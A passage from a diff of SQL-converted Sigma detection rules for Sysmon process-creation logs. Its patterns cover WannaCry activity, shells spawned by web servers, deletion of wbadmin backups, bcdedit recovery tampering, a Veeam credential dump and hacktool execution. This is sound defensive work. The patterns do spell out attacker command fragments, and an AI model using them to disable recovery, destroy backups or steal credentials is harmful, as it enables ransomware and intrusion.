LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dump64.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_direct_ip.yml" }, { - "title": "RDP Connection Allowed Via Netsh.EXE", - "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "title": "WannaCry Ransomware Activity", + "id": "41d40bff-377a-43e2-8e1b-2e543069e079", "status": "test", - "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", - "author": "Sander Wiebing", + "description": "Detects WannaCry ransomware activity", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", "attack.defense_evasion", - "attack.t1562.004" + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR Image LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskse.exe' ESCAPE '\\' OR Image LIKE '%\\\\111.exe' ESCAPE '\\' OR Image LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR Image LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR Image LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR Image LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + "filename": "proc_creation_win_malware_wannacry.yml" }, { - "title": "APT29 2018 Phishing Campaign CommandLine Indicators", - "id": "7453575c-a747-40b9-839b-125a0aae324b", - "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "Florian Roth (Nextron Systems), @41thexplorer", + "title": "Security Privileges Enumeration Via Whoami.EXE", + "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "status": "experimental", + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%-noni -ep bypass $%' ESCAPE '\\' OR (CommandLine LIKE '%cyzfc.dat,%' ESCAPE '\\' AND CommandLine LIKE '%PointFunctionCall%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml" + "filename": "proc_creation_win_whoami_priv_discovery.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation", - "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", - "status": "test", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Download Arbitrary Files Via PresentationHost.exe", + "id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "status": "experimental", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" + "filename": "proc_creation_win_lolbin_presentationhost_download.yml" }, { - "title": "Renamed AutoHotkey.EXE Execution", - "id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", "status": "test", - "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", - "author": "Nasreddine Bencherchali", + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1505.003", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Particular web applications may spawn a shell process legitimately" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%AutoHotkey%' ESCAPE '\\' OR Description LIKE '%AutoHotkey%' ESCAPE '\\' OR OriginalFileName IN ('AutoHotkey.exe', 'AutoHotkey.rc')) AND NOT ((Image LIKE '%\\\\AutoHotkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey64\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyA32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyA32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU64\\_UIA.exe' ESCAPE '\\') OR Image LIKE '%\\\\AutoHotkey%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\at.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsget.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR Image LIKE '%\\\\find.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\hostname.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netdom.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\ver.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_autohotkey.yml" + "filename": "proc_creation_win_webshell_spawn.yml" }, { - "title": "Suspicious PowerShell Invocation From Script Engines", - "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", - "status": "test", - "description": "Detects suspicious powershell invocations from interpreters or unusual programs", - "author": "Florian Roth (Nextron Systems)", + "title": "Process Creation Using Sysnative Folder", + "id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", + "status": "experimental", + "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.t1055" ], "falsepositives": [ - "Microsoft Operations Manager (MOM)", - "Other scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\Health Service State\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE 'C:\\\\Windows\\\\Sysnative\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_script_engine_parent.yml" + "filename": "proc_creation_win_susp_sysnative.yml" }, { - "title": "PDQ Deploy Remote Adminstartion Tool Execution", - "id": "d679950c-abb7-43a6-80fb-2a480c4fc450", + "title": "Import LDAP Data Interchange Format File Via Ldifde.EXE", + "id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", "status": "experimental", - "description": "Detect use of PDQ Deploy remote admin tool", - "author": "frack113", + "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", + "author": "@gott_cyber", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.command_and_control", + "attack.defense_evasion", + "attack.t1218", + "attack.t1105" ], "falsepositives": [ - "Legitimate use" + "Since the content of the files are unknown, false positives are expected" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PDQ Deploy Console' OR Product = 'PDQ Deploy' OR Company = 'PDQ.com' OR OriginalFileName = 'PDQDeployConsole.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND (CommandLine LIKE '%-i%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pdqdeploy_execution.yml" + "filename": "proc_creation_win_ldifde_file_load.yml" }, { - "title": "Boot Configuration Tampering Via Bcdedit.EXE", - "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "status": "stable", - "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Suspicious Parent Double Extension File Execution", + "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "status": "experimental", + "description": "Detect execution of suspicious double extension files in ParentCommandLine", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%.doc.lnk' ESCAPE '\\' OR ParentImage LIKE '%.docx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xls.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.txt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.doc.js' ESCAPE '\\' OR ParentImage LIKE '%.docx.js' ESCAPE '\\' OR ParentImage LIKE '%.xls.js' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.js' ESCAPE '\\' OR ParentImage LIKE '%.ppt.js' ESCAPE '\\' OR ParentImage LIKE '%.pptx.js' ESCAPE '\\' OR ParentImage LIKE '%.rtf.js' ESCAPE '\\' OR ParentImage LIKE '%.pdf.js' ESCAPE '\\' OR ParentImage LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" + "filename": "proc_creation_win_susp_double_extension_parent.yml" }, { - "title": "Suspicious Execution of Shutdown to Log Out", - "id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", + "title": "Potential Privilege Escalation To LOCAL SYSTEM", + "id": "207b0396-3689-42d9-8399-4222658efc99", "status": "experimental", - "description": "Detects the rare use of the command line tool shutdown to logoff a user", - "author": "frack113", + "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1529" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND CommandLine LIKE '%/l%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_shutdown_logoff.yml" + "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" }, { - "title": "Droppers Exploiting CVE-2017-11882", - "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", - "status": "stable", - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "Renamed Jusched.EXE Execution", + "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "status": "test", + "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", + "author": "Markus Neis, Swisscom", "tags": [ "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (Image LIKE '%\\\\jusched.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml" + "filename": "proc_creation_win_renamed_jusched.yml" }, { - "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", - "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", + "title": "SystemStateBackup Deleted Using Wbadmin.EXE", + "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", "status": "test", - "description": "Detects dump of credentials in VeeamBackup dbo", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" + "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" }, { - "title": "Node Process Executions", - "id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", + "title": "HackTool - Stracciatella Execution", + "id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "status": "experimental", - "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1127", - "attack.t1059.007" + "attack.t1059", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\Adobe Creative Cloud Experience\\\\libs\\\\node.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%Adobe Creative Cloud Experience\\\\js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Stracciatella.exe' ESCAPE '\\' OR OriginalFileName = 'Stracciatella.exe' OR Description = 'Stracciatella' OR (Hashes LIKE '%SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a%' ESCAPE '\\') OR sha256 IN ('9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956', 'fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a')))" ], - "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml" + "filename": "proc_creation_win_hktl_stracciatella_execution.yml" }, { - "title": "Use of Remote.exe", - "id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", + "title": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", + "id": "01c42d3c-242d-4655-85b2-34f1739632f7", "status": "experimental", - "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects usage of Dsacls to grant over permissive permissions", + "author": 